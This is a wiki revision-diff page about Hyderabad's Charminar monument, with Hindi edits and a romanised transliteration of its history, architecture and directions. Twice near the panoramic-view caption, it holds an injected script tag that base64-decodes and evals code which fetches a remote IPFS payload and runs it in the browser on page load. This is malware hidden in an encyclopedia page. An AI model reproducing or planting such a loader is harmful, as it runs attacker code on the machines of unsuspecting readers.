Difference between revisions of "चारमीनार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "यहां" to "यहाँ")
m (Text replace - "बाजार" to "बाज़ार")
Line 24: Line 24:
 
पहले तल को क़ुतुब शाही अवधि के दौरान मदरसे के रूप में उपयोग किया जाता था। दूसरे तल पर पश्चिमी दिशा में एक मस्जिद है, जिसका गुम्‍बद सड़क से ही दिखाई देता है, यदि कुछ दूरी पर खड़े होकर देखा जाए। चार मीनार की छत पर जाकर शहर का एक विहंगम दृश्‍य दिखाई देता है, जबकि मीनारों के अंदर अत्‍यधिक भीड़ के कारण कुछ विशेष अतिथियों को भारतीय पुरातत्‍व सर्वेक्षण, हैदराबाद वृत की अनुमति से यहाँ जाने दिया जाता है और वे मीनारों के सबसे ऊपरी सिरे पर जाकर हैदराबाद का दृश्‍य देख सकते हैं। वर्ष 1889 पर उपरोक्‍त चारों आर्चवे पर घडियां लगाई गई थीं।
 
पहले तल को क़ुतुब शाही अवधि के दौरान मदरसे के रूप में उपयोग किया जाता था। दूसरे तल पर पश्चिमी दिशा में एक मस्जिद है, जिसका गुम्‍बद सड़क से ही दिखाई देता है, यदि कुछ दूरी पर खड़े होकर देखा जाए। चार मीनार की छत पर जाकर शहर का एक विहंगम दृश्‍य दिखाई देता है, जबकि मीनारों के अंदर अत्‍यधिक भीड़ के कारण कुछ विशेष अतिथियों को भारतीय पुरातत्‍व सर्वेक्षण, हैदराबाद वृत की अनुमति से यहाँ जाने दिया जाता है और वे मीनारों के सबसे ऊपरी सिरे पर जाकर हैदराबाद का दृश्‍य देख सकते हैं। वर्ष 1889 पर उपरोक्‍त चारों आर्चवे पर घडियां लगाई गई थीं।
  
चार मीनार के क्षेत्र में टहलते हुए आप इतिहास के अवशेषों को वर्तमान से मिलता हुआ देखकर निरंतर आश्‍चर्य कर सकते हैं। चार मीनार के दक्षिण पूर्व की ओर निज़ामिया यूनानी अस्‍पताल की इमारत स्थित है। पश्चिम में लगभग 50 मीटर की दूरी पर लाड बाजार की दुकानों के बीच एक पुरानी ढहती भूरी दीवार है जो पुराने निज़ाम के जिलाऊ खाना या परेड के मैदान का प्रवेश दर्शाती है। अब इन मैदानों का उपयोग बड़े वाणिज्यिक संकुल के विकास में किया जा रहा है। पुन: बांईं ओर एक सड़क खिलावत कॉम्प्‍लेक्‍स (चौ महाल्‍ला पैलेस) की ओर जाती है। लाड बाजार की सड़क महबूब चौक पर समाप्‍त होती है जहां 19वीं शताब्‍दी के दौरान बनाई गई कोमल सफेद मस्जिद पर उसी अवधि के क्‍लॉक टावर लूम स्थित हैं।
+
चार मीनार के क्षेत्र में टहलते हुए आप इतिहास के अवशेषों को वर्तमान से मिलता हुआ देखकर निरंतर आश्‍चर्य कर सकते हैं। चार मीनार के दक्षिण पूर्व की ओर निज़ामिया यूनानी अस्‍पताल की इमारत स्थित है। पश्चिम में लगभग 50 मीटर की दूरी पर लाड बाज़ार की दुकानों के बीच एक पुरानी ढहती भूरी दीवार है जो पुराने निज़ाम के जिलाऊ खाना या परेड के मैदान का प्रवेश दर्शाती है। अब इन मैदानों का उपयोग बड़े वाणिज्यिक संकुल के विकास में किया जा रहा है। पुन: बांईं ओर एक सड़क खिलावत कॉम्प्‍लेक्‍स (चौ महाल्‍ला पैलेस) की ओर जाती है। लाड बाज़ार की सड़क महबूब चौक पर समाप्‍त होती है जहां 19वीं शताब्‍दी के दौरान बनाई गई कोमल सफेद मस्जिद पर उसी अवधि के क्‍लॉक टावर लूम स्थित हैं।
 
[[चित्र:Charminar-Hyderabad-2.jpg|चारमीनार, [[हैदराबाद]]<br /> Charminar, Hyderabad|thumb]]
 
[[चित्र:Charminar-Hyderabad-2.jpg|चारमीनार, [[हैदराबाद]]<br /> Charminar, Hyderabad|thumb]]
 
==कैसे पहुँचें==
 
==कैसे पहुँचें==

Revision as of 13:52, 26 September 2010

[[chitr:Charminar-Hyderabad-1.jpg|charaminar, haidarabad
Charminar, Hyderabad|thumb]]

bharatiy rajy aandhr pradesh ki rajadhani haidarabad ka sabase prasiddh aur mahatvapoorn smarak hai. char minar ko yahaan ke shasak muhammad kuli qutubashah ne banavaya tha. haidarabad shahar prachin aur adhunik samay ka anokha mishran hai jo dekhane valoan ko 400 varsh purane bhavanoan ki bhavh‍yata ke sath apas mean sati adhunik imaratoan ka darshan bhi karata hai.

vastukala

yah qutub shahi vash‍tukala ke kuchh uth‍krishh‍t udaharanoan ko pradarshit karata hai -

  1. jami masjid,
  2. makh‍ka masjid,
  3. tauli masjid aur
  4. beshak haidarabad ka prabhavashali chinh‍h, char minar.

[[chitr:Charminar-Hyderabad-3.jpg|charaminar, haidarabad
Charminar, Hyderabad|thumb]]

nirman samay

charaminar 1591 mean shahar ke aandar ph‍leg ki samapti ki khushi mean mohamh‍mad kuli qutub shah dvara banavaee gee brihat vash‍tukala ka ek namoona hai. shahar ki pahachan mani jane vali charaminar char minaroan se milakar bani ek chaukor prabhavashali imarat hai. isake meharab mean har sham roshani ki jati hai jo ek avish‍maraniy drishh‍y ban jata hai.

vastu

yah sh‍marak grenait ke manamohak chaukor khamh‍bhoan se bana hai, jo uttar, dakshin, poorv aur pashchim dishaoan mean sthit char vishal arch par nirmit kiya gaya hai. yah arch kamaroan ke do taloan aur archave ki gelari ko sahara dete haian. chaukor sanrachana ke prath‍yek kone par ek chhoti minar hai jo 24 mi. ooanchaee ki hai, is prakar yah bhavan lagabhag 54 mitar ooancha ban jata hai. ye char minarean haian, jinake karan bhavan ko yah nam diya gaya hai. prath‍yek minar kamal ki pattiyoan ke adhar ki sanrachana par kh di hai, jo qutub shahi bhavanoan mean upayog kiya jane vala tath‍kalin vishesh motiph hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>charaminar ka vihangam drishy
Panoramic View of Charminar

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Inside-View-Charminar-Hyderabad-4.jpg|charaminar, haidarabad
Charminar, Hyderabad|thumb]]

vihangam drishy

pahale tal ko qutub shahi avadhi ke dauran madarase ke roop mean upayog kiya jata tha. doosare tal par pashchimi disha mean ek masjid hai, jisaka gumh‍bad s dak se hi dikhaee deta hai, yadi kuchh doori par kh de hokar dekha jae. char minar ki chhat par jakar shahar ka ek vihangam drishh‍y dikhaee deta hai, jabaki minaroan ke aandar ath‍yadhik bhi d ke karan kuchh vishesh atithiyoan ko bharatiy puratath‍v sarvekshan, haidarabad vrit ki anumati se yahaan jane diya jata hai aur ve minaroan ke sabase oopari sire par jakar haidarabad ka drishh‍y dekh sakate haian. varsh 1889 par uparokh‍t charoan archave par ghadiyaan lagaee gee thian.

char minar ke kshetr mean tahalate hue ap itihas ke avasheshoan ko vartaman se milata hua dekhakar nirantar ashh‍chary kar sakate haian. char minar ke dakshin poorv ki or nizamiya yoonani ash‍patal ki imarat sthit hai. pashchim mean lagabhag 50 mitar ki doori par lad bazar ki dukanoan ke bich ek purani dhahati bhoori divar hai jo purane nizam ke jilaoo khana ya pared ke maidan ka pravesh darshati hai. ab in maidanoan ka upayog b de vanijyik sankul ke vikas mean kiya ja raha hai. pun: baaneean or ek s dak khilavat k aaumph‍lekh‍s (chau mahalh‍la pailes) ki or jati hai. lad bazar ki s dak mahaboob chauk par samaph‍t hoti hai jahaan 19vian shatabh‍di ke dauran banaee gee komal saphed masjid par usi avadhi ke kh‍l aauk tavar loom sthit haian. [[chitr:Charminar-Hyderabad-2.jpg|charaminar, haidarabad
Charminar, Hyderabad|thumb]]

kaise pahuanchean

  • char minar haidarabad relave sh‍teshan se lagabhag 7 kilo mitar ki doori par hai.
  • yah haidarabad bas sh‍teshan se 5 kilo mitar ki doori par hai.
  • donoan shaharoan ke sabhi hish‍soan se uth‍krishh‍t niji parivahan suvidha upalabh‍dh hai.
  • "ark di traimh‍ph aauph d ish‍t" namak char minar haidarabad ki pahachan hai.
  • shahar jitani purani ye char minarean is bhavan ke sath purane shahar ke madhh‍y mean haian aur ye qutub shahi yug ka h aaul mark haian.